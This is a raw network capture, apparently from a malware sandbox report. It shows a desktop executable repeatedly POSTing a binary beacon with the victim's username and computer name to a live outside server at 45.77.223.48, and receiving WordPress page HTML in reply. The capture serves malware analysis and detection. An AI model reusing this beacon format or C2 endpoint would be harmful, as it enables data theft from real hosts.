Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49806	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:41.435996056 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:41.624288082 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:42.566795111 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:41 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:42.566847086 CEST	64	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
Apr 26, 2024 04:43:42.566884041 CEST	77	IN	Data Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:42.576086044 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:42.576564074 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:42.576620102 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:42.576788902 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:42.576922894 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:42.577071905 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:42.755841970 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49807	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:42.908988953 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:43.096909046 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:44.010294914 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:43 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:44.010323048 CEST	64	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
Apr 26, 2024 04:43:44.010523081 CEST	77	IN	Data Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:44.020178080 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:44.020514965 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:44.020759106 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:44.020901918 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:44.021147966 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:44.021224976 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:44.021245956 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49808	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:44.358397961 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:44.546508074 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:45.032583952 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:45.615983009 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:44 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:45.616070032 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:45.616192102 CEST	11	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: UTF-8" />
Apr 26, 2024 04:43:45.616357088 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:45.638055086 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:45.643618107 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:45.644862890 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:45.644897938 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:45.645163059 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49809	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:45.956579924 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:46.146183014 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:47.149636030 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:46 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:47.149914026 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:47.159240007 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:47.159492016 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:47.159635067 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:47.159763098 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:47.160090923 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:47.160171986 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:47.160248041 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:47.337677002 CEST	1289	IN	Data Raw: 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e Data Ascii: lock-social-links .wp-block-social-link.wp-social-link{display:inline-block;margin:0;padding:0}.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49810	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:47.482326984 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:47.670917034 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:48.644124031 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:47 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:48.644233942 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:48.644273043 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:48.687594891 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:48.687644958 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:48.687685966 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:48.687721014 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:48.687916994 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
